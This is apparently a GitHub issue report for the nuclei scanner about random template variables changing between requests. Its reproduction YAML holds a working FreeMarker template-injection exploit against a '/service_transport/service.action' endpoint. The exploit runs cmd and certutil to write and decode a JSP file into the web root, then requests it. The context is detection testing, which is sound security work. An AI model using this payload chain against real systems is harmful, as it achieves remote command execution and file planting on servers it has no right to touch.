nuclei
nuclei copied to clipboard
projectdiscovery
Generate random strings that are not the same before and after
Nuclei version:
v3.0.4
Current Behavior:
When I use {{to_lower(rand_base(5))}} to generate random strings, the sequence is not the same when sending the request.
Steps To Reproduce:
This is part of the yaml content I wrote
variables:
filename: "{{to_lower(rand_base(5))}}"
value: "{{to_lower(rand_base(5))}}"
encode: '<% out.print("{{value}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>'
requests:
- raw:
- |
@timeout: 15s
POST /service_transport/service.action HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,{{wait_for(10)}}
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo {{base64(encode)}} >./webapps/ROOT/{{filename}}.txt\")}"
}
- |
@timeout: 15s
POST /service_transport/service.action HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,{{wait_for(10)}}
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/{{filename}}.txt ./webapps/ROOT/{{filename}}.jsp\")}"
}
- |
GET /{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
I used a random filename generated by {{to_lower(rand_base(5))}} to save the filename, but when the request was successful, it was obvious that the filename filename was different in the three times the request was made, as follows
